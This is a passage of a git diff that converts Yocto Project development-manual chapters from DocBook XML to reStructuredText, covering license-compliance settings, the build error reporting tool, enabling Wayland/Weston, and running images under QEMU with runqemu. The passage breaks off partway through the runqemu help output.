-                </para>
-            </section>
-
-            <section id='providing-license-text'>
-                <title>Providing License Text</title>
-
-                <para>
-                    One requirement that is often overlooked is inclusion
-                    of license text.
-                    This requirement also needs to be dealt with prior to
-                    generating the final image.
-                    Some licenses require the license text to accompany
-                    the binary.
-                    You can achieve this by adding the following to your
-                    <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     COPY_LIC_MANIFEST = "1"
-     COPY_LIC_DIRS = "1"
-     LICENSE_CREATE_PACKAGE = "1"
-                    </literallayout>
-                    Adding these statements to the configuration file ensures
-                    that the licenses collected during package generation
-                    are included on your image.
-                    <note>
-                        <para>Setting all three variables to "1" results in the
-                        image having two copies of the same license file.
-                        One copy resides in
-                        <filename>/usr/share/common-licenses</filename> and
-                        the other resides in
-                        <filename>/usr/share/license</filename>.</para>
-
-                        <para>The reason for this behavior is because
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-COPY_LIC_DIRS'><filename>COPY_LIC_DIRS</filename></ulink>
-                        and
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></ulink>
-                        add a copy of the license when the image is built but do
-                        not offer a path for adding licenses for newly installed
-                        packages to an image.
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_CREATE_PACKAGE'><filename>LICENSE_CREATE_PACKAGE</filename></ulink>
-                        adds a separate package and an upgrade path for adding
-                        licenses to an image.</para>
-                    </note>
-                </para>
-
-                <para>
-                    As the source <filename>archiver</filename> class has already
-                    archived the original
-                    unmodified source that contains the license files,
-                    you would have already met the requirements for inclusion
-                    of the license information with source as defined by the GPL
-                    and other open source licenses.
-                </para>
-            </section>
-
-            <section id='providing-compilation-scripts-and-source-code-modifications'>
-                <title>Providing Compilation Scripts and Source Code Modifications</title>
-
-                <para>
-                    At this point, we have addressed all we need to
-                    prior to generating the image.
-                    The next two requirements are addressed during the final
-                    packaging of the release.
-                </para>
-
-                <para>
-                    By releasing the version of the OpenEmbedded build system
-                    and the layers used during the build, you will be providing both
-                    compilation scripts and the source code modifications in one
-                    step.
-                </para>
-
-                <para>
-                    If the deployment team has a
-                    <ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP layer</ulink>
-                    and a distro layer, and those those layers are used to patch,
-                    compile, package, or modify (in any way) any open source
-                    software included in your released images, you
-                    might be required to release those layers under section 3 of
-                    GPLv2 or section 1 of GPLv3.
-                    One way of doing that is with a clean
-                    checkout of the version of the Yocto Project and layers used
-                    during your build.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     # We built using the &DISTRO_NAME_NO_CAP; branch of the poky repo
-     $ git clone -b &DISTRO_NAME_NO_CAP; git://git.yoctoproject.org/poky
-     $ cd poky
-     # We built using the release_branch for our layers
-     $ git clone -b release_branch git://git.mycompany.com/meta-my-bsp-layer
-     $ git clone -b release_branch git://git.mycompany.com/meta-my-software-layer
-     # clean up the .git repos
-     $ find . -name ".git" -type d -exec rm -rf {} \;
-                    </literallayout>
-                    One thing a development organization might want to consider
-                    for end-user convenience is to modify
-                    <filename>meta-poky/conf/bblayers.conf.sample</filename> to
-                    ensure that when the end user utilizes the released build
-                    system to build an image, the development organization's
-                    layers are included in the <filename>bblayers.conf</filename>
-                    file automatically:
-                    <literallayout class='monospaced'>
-     # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
-     # changes incompatibly
-     POKY_BBLAYERS_CONF_VERSION = "2"
-
-     BBPATH = "${TOPDIR}"
-     BBFILES ?= ""
-
-     BBLAYERS ?= " \
-       ##OEROOT##/meta \
-       ##OEROOT##/meta-poky \
-       ##OEROOT##/meta-yocto-bsp \
-       ##OEROOT##/meta-mylayer \
-       "
-                    </literallayout>
-                    Creating and providing an archive of the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
-                    layers (recipes, configuration files, and so forth)
-                    enables you to meet your
-                    requirements to include the scripts to control compilation
-                    as well as any modifications to the original source.
-                </para>
-            </section>
-        </section>
-
-        <section id='copying-licenses-that-do-not-exist'>
-            <title>Copying Licenses that Do Not Exist</title>
-
-            <para>
-                Some packages, such as the linux-firmware package, have many
-                licenses that are not in any way common.
-                You can avoid adding a lot of these types of common license
-                files, which are only applicable to a specific package, by using
-                the
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-NO_GENERIC_LICENSE'><filename>NO_GENERIC_LICENSE</filename></ulink>
-                variable.
-                Using this variable also avoids QA errors when you use a
-                non-common, non-CLOSED license in a recipe.
-            </para>
-
-            <para>
-                The following is an example that uses the
-                <filename>LICENSE.Abilis.txt</filename>
-                file as the license from the fetched source:
-                <literallayout class='monospaced'>
-     NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='using-the-error-reporting-tool'>
-        <title>Using the Error Reporting Tool</title>
-
-        <para>
-            The error reporting tool allows you to
-            submit errors encountered during builds to a central database.
-            Outside of the build environment, you can use a web interface to
-            browse errors, view statistics, and query for errors.
-            The tool works using a client-server system where the client
-            portion is integrated with the installed Yocto Project
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-            (e.g. <filename>poky</filename>).
-            The server receives the information collected and saves it in a
-            database.
-        </para>
-
-        <para>
-            A live instance of the error reporting server exists at
-            <ulink url='http://errors.yoctoproject.org'></ulink>.
-            This server exists so that when you want to get help with
-            build failures, you can submit all of the information on the
-            failure easily and then point to the URL in your bug report
-            or send an email to the mailing list.
-            <note>
-                If you send error reports to this server, the reports become
-                publicly visible.
-            </note>
-        </para>
-
-        <section id='enabling-and-using-the-tool'>
-            <title>Enabling and Using the Tool</title>
-
-            <para>
-                By default, the error reporting tool is disabled.
-                You can enable it by inheriting the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-report-error'><filename>report-error</filename></ulink>
-                class by adding the following statement to the end of
-                your <filename>local.conf</filename> file in your
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                <literallayout class='monospaced'>
-     INHERIT += "report-error"
-                </literallayout>
-            </para>
-
-            <para>
-                By default, the error reporting feature stores information in
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-LOG_DIR'><filename>LOG_DIR</filename></ulink><filename>}/error-report</filename>.
-                However, you can specify a directory to use by adding the following
-                to your <filename>local.conf</filename> file:
-                <literallayout class='monospaced'>
-     ERR_REPORT_DIR = "path"
-                </literallayout>
-                Enabling error reporting causes the build process to collect
-                the errors and store them in a file as previously described.
-                When the build system encounters an error, it includes a
-                command as part of the console output.
-                You can run the command to send the error file to the server.
-                For example, the following command sends the errors to an
-                upstream server:
-                <literallayout class='monospaced'>
-     $ send-error-report /home/brandusa/project/poky/build/tmp/log/error-report/error_report_201403141617.txt
-                </literallayout>
-                In the previous example, the errors are sent to a public
-                database available at
-                <ulink url='http://errors.yoctoproject.org'></ulink>, which is
-                used by the entire community.
-                If you specify a particular server, you can send the errors
-                to a different database.
-                Use the following command for more information on available
-                options:
-                <literallayout class='monospaced'>
-     $ send-error-report --help
-                </literallayout>
-            </para>
-
-            <para>
-                When sending the error file, you are prompted to review the
-                data being sent as well as to provide a name and optional
-                email address.
-                Once you satisfy these prompts, the command returns a link
-                from the server that corresponds to your entry in the database.
-                For example, here is a typical link:
-                <literallayout class='monospaced'>
-     http://errors.yoctoproject.org/Errors/Details/9522/
-                </literallayout>
-                Following the link takes you to a web interface where you can
-                browse, query the errors, and view statistics.
-             </para>
-        </section>
-
-        <section id='disabling-the-tool'>
-            <title>Disabling the Tool</title>
-
-            <para>
-                To disable the error reporting feature, simply remove or comment
-                out the following statement from the end of your
-                <filename>local.conf</filename> file in your
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
-                <literallayout class='monospaced'>
-     INHERIT += "report-error"
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='setting-up-your-own-error-reporting-server'>
-            <title>Setting Up Your Own Error Reporting Server</title>
-
-            <para>
-                If you want to set up your own error reporting server, you
-                can obtain the code from the Git repository at
-                <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/error-report-web/'></ulink>.
-                Instructions on how to set it up are in the README document.
-            </para>
-        </section>
-     </section>
-
-    <section id="dev-using-wayland-and-weston">
-        <title>Using Wayland and Weston</title>
-
-        <para>
-            <ulink url='http://en.wikipedia.org/wiki/Wayland_(display_server_protocol)'>Wayland</ulink>
-            is a computer display server protocol that
-            provides a method for compositing window managers to communicate
-            directly with applications and video hardware and expects them to
-            communicate with input hardware using other libraries.
-            Using Wayland with supporting targets can result in better control
-            over graphics frame rendering than an application might otherwise
-            achieve.
-        </para>
-
-        <para>
-            The Yocto Project provides the Wayland protocol libraries and the
-            reference
-            <ulink url='http://en.wikipedia.org/wiki/Wayland_(display_server_protocol)#Weston'>Weston</ulink>
-            compositor as part of its release.
-            You can find the integrated packages in the
-            <filename>meta</filename> layer of the
-            <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-            Specifically, you can find the recipes that build both Wayland
-            and Weston at <filename>meta/recipes-graphics/wayland</filename>.
-        </para>
-
-        <para>
-            You can build both the Wayland and Weston packages for use only
-            with targets that accept the
-            <ulink url='https://en.wikipedia.org/wiki/Mesa_(computer_graphics)'>Mesa 3D and Direct Rendering Infrastructure</ulink>,
-            which is also known as Mesa DRI.
-            This implies that you cannot build and use the packages if your
-            target uses, for example, the
-            <trademark class='registered'>Intel</trademark> Embedded Media
-            and Graphics Driver
-            (<trademark class='registered'>Intel</trademark> EMGD) that
-            overrides Mesa DRI.
-            <note>
-                Due to lack of EGL support, Weston 1.0.3 will not run
-                directly on the emulated QEMU hardware.
-                However, this version of Weston will run under X emulation
-                without issues.
-            </note>
-        </para>
-
-        <para>
-            This section describes what you need to do to implement Wayland and
-            use the Weston compositor when building an image for a supporting
-            target.
-        </para>
-
-        <section id="enabling-wayland-in-an-image">
-            <title>Enabling Wayland in an Image</title>
-
-            <para>
-                To enable Wayland, you need to enable it to be built and enable
-                it to be included (installed) in the image.
-            </para>
-
-            <section id="enable-building">
-                <title>Building</title>
-
-                <para>
-                    To cause Mesa to build the <filename>wayland-egl</filename>
-                    platform and Weston to build Wayland with Kernel Mode
-                    Setting
-                    (<ulink url='https://wiki.archlinux.org/index.php/Kernel_Mode_Setting'>KMS</ulink>)
-                    support, include the "wayland" flag in the
-                    <ulink url="&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES"><filename>DISTRO_FEATURES</filename></ulink>
-                    statement in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     DISTRO_FEATURES_append = " wayland"
-                    </literallayout>
-                    <note>
-                        If X11 has been enabled elsewhere, Weston will build
-                        Wayland with X11 support
-                    </note>
-                </para>
-            </section>
-
-            <section id="enable-installation-in-an-image">
-                <title>Installing</title>
-
-                <para>
-                    To install the Wayland feature into an image, you must
-                    include the following
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-CORE_IMAGE_EXTRA_INSTALL'><filename>CORE_IMAGE_EXTRA_INSTALL</filename></ulink>
-                    statement in your <filename>local.conf</filename> file:
-                    <literallayout class='monospaced'>
-     CORE_IMAGE_EXTRA_INSTALL += "wayland weston"
-                    </literallayout>
-                </para>
-            </section>
-        </section>
-
-        <section id="running-weston">
-            <title>Running Weston</title>
-
-            <para>
-                To run Weston inside X11, enabling it as described earlier and
-                building a Sato image is sufficient.
-                If you are running your image under Sato, a Weston Launcher
-                appears in the "Utility" category.
-            </para>
-
-            <para>
-                Alternatively, you can run Weston through the command-line
-                interpretor (CLI), which is better suited for development work.
-                To run Weston under the CLI, you need to do the following after
-                your image is built:
-                <orderedlist>
-                    <listitem><para>
-                        Run these commands to export
-                        <filename>XDG_RUNTIME_DIR</filename>:
-                        <literallayout class='monospaced'>
-     mkdir -p /tmp/$USER-weston
-     chmod 0700 /tmp/$USER-weston
-     export XDG_RUNTIME_DIR=/tmp/$USER-weston
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Launch Weston in the shell:
-                        <literallayout class='monospaced'>
-     weston
-                        </literallayout></para></listitem>
-                </orderedlist>
-            </para>
-        </section>
-    </section>
-</chapter>
-
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual-customization.xsl b/documentation/dev-manual/dev-manual-customization.xsl
deleted file mode 100644
index 523ea3c5ed..0000000000
--- a/documentation/dev-manual/dev-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
-  <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
-  <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-  <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
-  <xsl:include href="../template/permalinks.xsl"/>
-  <xsl:include href="../template/section.title.xsl"/>
-  <xsl:include href="../template/component.title.xsl"/>
-  <xsl:include href="../template/division.title.xsl"/>
-  <xsl:include href="../template/formal.object.heading.xsl"/>
-
-  <xsl:param name="html.stylesheet" select="'dev-style.css'" />
-  <xsl:param name="chapter.autolabel" select="1" />
-  <xsl:param name="appendix.autolabel" select="A" />
-  <xsl:param name="section.autolabel" select="1" />
-  <xsl:param name="section.label.includes.component.label" select="1" />
-  <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/dev-manual/dev-manual-intro.rst b/documentation/dev-manual/dev-manual-intro.rst
new file mode 100644
index 0000000000..05136f7353
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-intro.rst
@@ -0,0 +1,61 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************************
+The Yocto Project Development Tasks Manual
+******************************************
+
+.. _dev-welcome:
+
+Welcome
+=======
+
+Welcome to the Yocto Project Development Tasks Manual! This manual
+provides relevant procedures necessary for developing in the Yocto
+Project environment (i.e. developing embedded Linux images and
+user-space applications that run on targeted devices). The manual groups
+related procedures into higher-level sections. Procedures can consist of
+high-level steps or low-level steps depending on the topic.
+
+This manual provides the following:
+
+-  Procedures that help you get going with the Yocto Project. For
+   example, procedures that show you how to set up a build host and work
+   with the Yocto Project source repositories.
+
+-  Procedures that show you how to submit changes to the Yocto Project.
+   Changes can be improvements, new features, or bug fixes.
+
+-  Procedures related to "everyday" tasks you perform while developing
+   images and applications using the Yocto Project. For example,
+   procedures to create a layer, customize an image, write a new recipe,
+   and so forth.
+
+This manual does not provide the following:
+
+-  Redundant Step-by-step Instructions: For example, the
+   :doc:`../sdk-manual/sdk-manual` manual contains detailed
+   instructions on how to install an SDK, which is used to develop
+   applications for target hardware.
+
+-  Reference or Conceptual Material: This type of material resides in an
+   appropriate reference manual. For example, system variables are
+   documented in the :doc:`../ref-manual/ref-manual`.
+
+-  Detailed Public Information Not Specific to the Yocto Project: For
+   example, exhaustive information on how to use the Source Control
+   Manager Git is better covered with Internet searches and official Git
+   Documentation than through the Yocto Project documentation.
+
+Other Information
+=================
+
+Because this manual presents information for many different topics,
+supplemental information is recommended for full comprehension. For
+introductory information on the Yocto Project, see the
+:yocto_home:`Yocto Project Website <>`. If you want to build an image with no
+knowledge of Yocto Project as a way of quickly testing it out, see the
+:doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+
+For a comprehensive list of links and other documentation, see the
+":ref:`ref-manual/resources:links and related documentation`"
+section in the Yocto Project Reference Manual.
diff --git a/documentation/dev-manual/dev-manual-intro.xml b/documentation/dev-manual/dev-manual-intro.xml
deleted file mode 100644
index 3a34094b8c..0000000000
--- a/documentation/dev-manual/dev-manual-intro.xml
+++ /dev/null
@@ -1,103 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='dev-manual-intro'>
-
-<title>The Yocto Project Development Tasks Manual</title>
-    <section id='dev-welcome'>
-        <title>Welcome</title>
-
-        <para>
-            Welcome to the Yocto Project Development Tasks Manual!
-            This manual provides relevant procedures necessary for developing
-            in the Yocto Project environment (i.e. developing embedded Linux
-            images and user-space applications that run on targeted devices).
-            The manual groups related procedures into higher-level sections.
-            Procedures can consist of high-level steps or low-level steps
-            depending on the topic.
-        </para>
-
-        <para>
-            This manual provides the following:
-            <itemizedlist>
-                <listitem><para>
-                    Procedures that help you get going with the Yocto Project.
-                    For example, procedures that show you how to set up
-                    a build host and work with the Yocto Project
-                    source repositories.
-                    </para></listitem>
-                <listitem><para>
-                    Procedures that show you how to submit changes to the
-                    Yocto Project.
-                    Changes can be improvements, new features, or bug
-                    fixes.
-                    </para></listitem>
-                <listitem><para>
-                    Procedures related to "everyday" tasks you perform while
-                    developing images and applications using the Yocto
-                    Project.
-                    For example, procedures to create a layer, customize an
-                    image, write a new recipe, and so forth.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            This manual does not provide the following:
-            <itemizedlist>
-                <listitem><para>
-                    Redundant Step-by-step Instructions:
-                    For example, the
-                    <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
-                    manual contains detailed instructions on how to install an
-                    SDK, which is used to develop applications for target
-                    hardware.
-                    </para></listitem>
-                <listitem><para>
-                    Reference or Conceptual Material:
-                    This type of material resides in an appropriate reference
-                    manual.
-                    For example, system variables are documented in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;'>Yocto Project Reference Manual</ulink>.
-                    </para></listitem>
-                <listitem><para>
-                    Detailed Public Information Not Specific to the
-                    Yocto Project:
-                    For example, exhaustive information on how to use the
-                    Source Control Manager Git is better covered with Internet
-                    searches and official Git Documentation than through the
-                    Yocto Project documentation.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id='other-information'>
-        <title>Other Information</title>
-
-        <para>
-            Because this manual presents information for many different
-            topics, supplemental information is recommended for full
-            comprehension.
-            For introductory information on the Yocto Project, see the
-            <ulink url='&YOCTO_HOME_URL;'>Yocto Project Website</ulink>.
-            If you want to build an image with no knowledge of Yocto Project
-            as a way of quickly testing it out, see the
-            <ulink url='&YOCTO_DOCS_BRIEF_URL;'>Yocto Project Quick Build</ulink>
-            document.
-        </para>
-
-        <para>
-            For a comprehensive list of links and other documentation, see the
-            "<ulink url='&YOCTO_DOCS_REF_URL;#resources-links-and-related-documentation'>Links and Related Documentation</ulink>"
-            section in the Yocto Project Reference Manual.
-        </para>
-
-        <para>
-        </para>
-    </section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual-qemu.rst b/documentation/dev-manual/dev-manual-qemu.rst
new file mode 100644
index 0000000000..c91e8b5389
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-qemu.rst
@@ -0,0 +1,477 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************************
+Using the Quick EMUlator (QEMU)
+*******************************
+
+The Yocto Project uses an implementation of the Quick EMUlator (QEMU)
+Open Source project as part of the Yocto Project development "tool set".
+This chapter provides both procedures that show you how to use the Quick
+EMUlator (QEMU) and other QEMU information helpful for development
+purposes.
+
+.. _qemu-dev-overview:
+
+Overview
+========
+
+Within the context of the Yocto Project, QEMU is an emulator and
+virtualization machine that allows you to run a complete image you have
+built using the Yocto Project as just another task on your build system.
+QEMU is useful for running and testing images and applications on
+supported Yocto Project architectures without having actual hardware.
+Among other things, the Yocto Project uses QEMU to run automated Quality
+Assurance (QA) tests on final images shipped with each release.
+
+.. note::
+
+   This implementation is not the same as QEMU in general.
+
+This section provides a brief reference for the Yocto Project
+implementation of QEMU.
+
+For official information and documentation on QEMU in general, see the
+following references:
+
+-  `QEMU Website <https://wiki.qemu.org/Main_Page>`__\ *:* The official
+   website for the QEMU Open Source project.
+
+-  `Documentation <https://wiki.qemu.org/Manual>`__\ *:* The QEMU user
+   manual.
+
+.. _qemu-running-qemu:
+
+Running QEMU
+============
+
+To use QEMU, you need to have QEMU installed and initialized as well as
+have the proper artifacts (i.e. image files and root filesystems)
+available. Follow these general steps to run QEMU:
+
+1. *Install QEMU:* QEMU is made available with the Yocto Project a
+   number of ways. One method is to install a Software Development Kit
+   (SDK). See ":ref:`sdk-manual/sdk-intro:the qemu emulator`" section in the
+   Yocto Project Application Development and the Extensible Software
+   Development Kit (eSDK) manual for information on how to install QEMU.
+
+2. *Setting Up the Environment:* How you set up the QEMU environment
+   depends on how you installed QEMU:
+
+   -  If you cloned the ``poky`` repository or you downloaded and
+      unpacked a Yocto Project release tarball, you can source the build
+      environment script (i.e. :ref:`structure-core-script`):
+      ::
+
+         $ cd ~/poky
+         $ source oe-init-build-env
+
+   -  If you installed a cross-toolchain, you can run the script that
+      initializes the toolchain. For example, the following commands run
+      the initialization script from the default ``poky_sdk`` directory:
+      ::
+
+         . ~/poky_sdk/environment-setup-core2-64-poky-linux
+
+3. *Ensure the Artifacts are in Place:* You need to be sure you have a
+   pre-built kernel that will boot in QEMU. You also need the target
+   root filesystem for your target machine's architecture:
+
+   -  If you have previously built an image for QEMU (e.g. ``qemux86``,
+      ``qemuarm``, and so forth), then the artifacts are in place in
+      your :term:`Build Directory`.
+
+   -  If you have not built an image, you can go to the
+      :yocto_dl:`machines/qemu </releases/yocto/yocto-3.1.2/machines/qemu/>` area and download a
+      pre-built image that matches your architecture and can be run on
+      QEMU.
+
+   See the ":ref:`sdk-manual/sdk-appendix-obtain:extracting the root filesystem`"
+   section in the Yocto Project Application Development and the
+   Extensible Software Development Kit (eSDK) manual for information on
+   how to extract a root filesystem.
+
+4. *Run QEMU:* The basic ``runqemu`` command syntax is as follows:
+   ::
+
+      $ runqemu [option ] [...]
+
+   Based on what you provide on the command
+   line, ``runqemu`` does a good job of figuring out what you are trying
+   to do. For example, by default, QEMU looks for the most recently
+   built image according to the timestamp when it needs to look for an
+   image. Minimally, through the use of options, you must provide either
+   a machine name, a virtual machine image (``*wic.vmdk``), or a kernel
+   image (``*.bin``).
+
+   Here are some additional examples to help illustrate further QEMU:
+
+   -  This example starts QEMU with MACHINE set to "qemux86-64".
+      Assuming a standard
+      :term:`Build Directory`, ``runqemu``
+      automatically finds the ``bzImage-qemux86-64.bin`` image file and
+      the ``core-image-minimal-qemux86-64-20200218002850.rootfs.ext4``
+      (assuming the current build created a ``core-image-minimal``
+      image).
+
+      .. note::
+
+         When more than one image with the same name exists, QEMU finds
+         and uses the most recently built image according to the
+         timestamp.
+
+      ::
+
+        $ runqemu qemux86-64
+
+   -  This example produces the exact same results as the previous
+      example. This command, however, specifically provides the image
+      and root filesystem type.
+      ::
+
+         $ runqemu qemux86-64 core-image-minimal ext4
+
+   -  This example specifies to boot an initial RAM disk image and to
+      enable audio in QEMU. For this case, ``runqemu`` set the internal
+      variable ``FSTYPE`` to "cpio.gz". Also, for audio to be enabled,
+      an appropriate driver must be installed (see the previous
+      description for the ``audio`` option for more information).
+      ::
+
+         $ runqemu qemux86-64 ramfs audio
+
+   -  This example does not provide enough information for QEMU to
+      launch. While the command does provide a root filesystem type, it
+      must also minimally provide a `MACHINE`, `KERNEL`, or `VM` option.
+      ::
+
+         $ runqemu ext4
+
+   -  This example specifies to boot a virtual machine image
+      (``.wic.vmdk`` file). From the ``.wic.vmdk``, ``runqemu``
+      determines the QEMU architecture (`MACHINE`) to be "qemux86-64" and
+      the root filesystem type to be "vmdk".
+      ::
+
+         $ runqemu /home/scott-lenovo/vm/core-image-minimal-qemux86-64.wic.vmdk
+
+Switching Between Consoles
+==========================
+
+When booting or running QEMU, you can switch between supported consoles
+by using Ctrl+Alt+number. For example, Ctrl+Alt+3 switches you to the
+serial console as long as that console is enabled. Being able to switch
+consoles is helpful, for example, if the main QEMU console breaks for
+some reason.
+
+.. note::
+
+   Usually, "2" gets you to the main console and "3" gets you to the
+   serial console.
+
+Removing the Splash Screen
+==========================
+
+You can remove the splash screen when QEMU is booting by using Alt+left.
+Removing the splash screen allows you to see what is happening in the
+background.
+
+Disabling the Cursor Grab
+=========================
+
+The default QEMU integration captures the cursor within the main window.
+It does this since standard mouse devices only provide relative input
+and not absolute coordinates. You then have to break out of the grab
+using the "Ctrl+Alt" key combination. However, the Yocto Project's
+integration of QEMU enables the wacom USB touch pad driver by default to
+allow input of absolute coordinates. This default means that the mouse
+can enter and leave the main window without the grab taking effect
+leading to a better user experience.
+
+.. _qemu-running-under-a-network-file-system-nfs-server:
+
+Running Under a Network File System (NFS) Server
+================================================
+
+One method for running QEMU is to run it on an NFS server. This is
+useful when you need to access the same file system from both the build
+and the emulated system at the same time. It is also worth noting that
+the system does not need root privileges to run. It uses a user space
+NFS server to avoid that. Follow these steps to set up for running QEMU
+using an NFS server.
+
+1. *Extract a Root Filesystem:* Once you are able to run QEMU in your
+   environment, you can use the ``runqemu-extract-sdk`` script, which is
+   located in the ``scripts`` directory along with the ``runqemu``
+   script.
+
+   The ``runqemu-extract-sdk`` takes a root filesystem tarball and
+   extracts it into a location that you specify. Here is an example that
+   takes a file system and extracts it to a directory named
+   ``test-nfs``:
+
+   .. code-block:: none
+
+      runqemu-extract-sdk ./tmp/deploy/images/qemux86-64/core-image-sato-qemux86-64.tar.bz2 test-nfs
+
+2. *Start QEMU:* Once you have extracted the file system, you can run
+   ``runqemu`` normally with the additional location of the file system.
+   You can then also make changes to the files within ``./test-nfs`` and
+   see those changes appear in the image in real time. Here is an
+   example using the ``qemux86`` image:
+
+   .. code-block:: none
+
+      runqemu qemux86-64 ./test-nfs
+
+.. note::
+
+   Should you need to start, stop, or restart the NFS share, you can use
+   the following commands:
+
+   -  The following command starts the NFS share:
+      ::
+
+         runqemu-export-rootfs start file-system-location
+
+   -  The following command stops the NFS share:
+      ::
+
+         runqemu-export-rootfs stop file-system-location
+
+   -  The following command restarts the NFS share:
+      ::
+
+         runqemu-export-rootfs restart file-system-location
+
+.. _qemu-kvm-cpu-compatibility:
+
+QEMU CPU Compatibility Under KVM
+================================
+
+By default, the QEMU build compiles for and targets 64-bit and x86 Intel
+Core2 Duo processors and 32-bit x86 Intel Pentium II processors. QEMU
+builds for and targets these CPU types because they display a broad
+range of CPU feature compatibility with many commonly used CPUs.
+
+Despite this broad range of compatibility, the CPUs could support a
+feature that your host CPU does not support. Although this situation is
+not a problem when QEMU uses software emulation of the feature, it can
+be a problem when QEMU is running with KVM enabled. Specifically,
+software compiled with a certain CPU feature crashes when run on a CPU
+under KVM that does not support that feature. To work around this
+problem, you can override QEMU's runtime CPU setting by changing the
+``QB_CPU_KVM`` variable in ``qemuboot.conf`` in the
+:term:`Build Directory` ``deploy/image``
+directory. This setting specifies a ``-cpu`` option passed into QEMU in
+the ``runqemu`` script. Running ``qemu -cpu help`` returns a list of
+available supported CPU types.
+
+.. _qemu-dev-performance:
+
+QEMU Performance
+================
+
+Using QEMU to emulate your hardware can result in speed issues depending
+on the target and host architecture mix. For example, using the
+``qemux86`` image in the emulator on an Intel-based 32-bit (x86) host
+machine is fast because the target and host architectures match. On the
+other hand, using the ``qemuarm`` image on the same Intel-based host can
+be slower. But, you still achieve faithful emulation of ARM-specific
+issues.
+
+To speed things up, the QEMU images support using ``distcc`` to call a
+cross-compiler outside the emulated system. If you used ``runqemu`` to
+start QEMU, and the ``distccd`` application is present on the host
+system, any BitBake cross-compiling toolchain available from the build
+system is automatically used from within QEMU simply by calling
+``distcc``. You can accomplish this by defining the cross-compiler
+variable (e.g. ``export CC="distcc"``). Alternatively, if you are using
+a suitable SDK image or the appropriate stand-alone toolchain is
+present, the toolchain is also automatically used.
+
+.. note::
+
+   Several mechanisms exist that let you connect to the system running
+   on the QEMU emulator:
+
+   -  QEMU provides a framebuffer interface that makes standard consoles
+      available.
+
+   -  Generally, headless embedded devices have a serial port. If so,
+      you can configure the operating system of the running image to use
+      that port to run a console. The connection uses standard IP
+      networking.
+
+   -  SSH servers exist in some QEMU images. The ``core-image-sato``
+      QEMU image has a Dropbear secure shell (SSH) server that runs with
+      the root password disabled. The ``core-image-full-cmdline`` and
+      ``core-image-lsb`` QEMU images have OpenSSH instead of Dropbear.
+      Including these SSH servers allow you to use standard ``ssh`` and
+      ``scp`` commands. The ``core-image-minimal`` QEMU image, however,
+      contains no SSH server.
+
+   -  You can use a provided, user-space NFS server to boot the QEMU
+      session using a local copy of the root filesystem on the host. In
+      order to make this connection, you must extract a root filesystem
+      tarball by using the ``runqemu-extract-sdk`` command. After
+      running the command, you must then point the ``runqemu`` script to
+      the extracted directory instead of a root filesystem image file.
+      See the "`Running Under a Network File System (NFS)
+      Server <#qemu-running-under-a-network-file-system-nfs-server>`__"
+      section for more information.
+
+.. _qemu-dev-command-line-syntax:
+
+QEMU Command-Line Syntax
+========================
+
+The basic ``runqemu`` command syntax is as follows:
+::
+
+   $ runqemu [option ] [...]
+
+Based on what you provide on the command line, ``runqemu`` does a
+good job of figuring out what you are trying to do. For example, by
+default, QEMU looks for the most recently built image according to the
+timestamp when it needs to look for an image. Minimally, through the use
+of options, you must provide either a machine name, a virtual machine
+image (``*wic.vmdk``), or a kernel image (``*.bin``).
+
+Following is the command-line help output for the ``runqemu`` command:
+::
+
+   $ runqemu --help
+
+   Usage: you can run this script with any valid combination
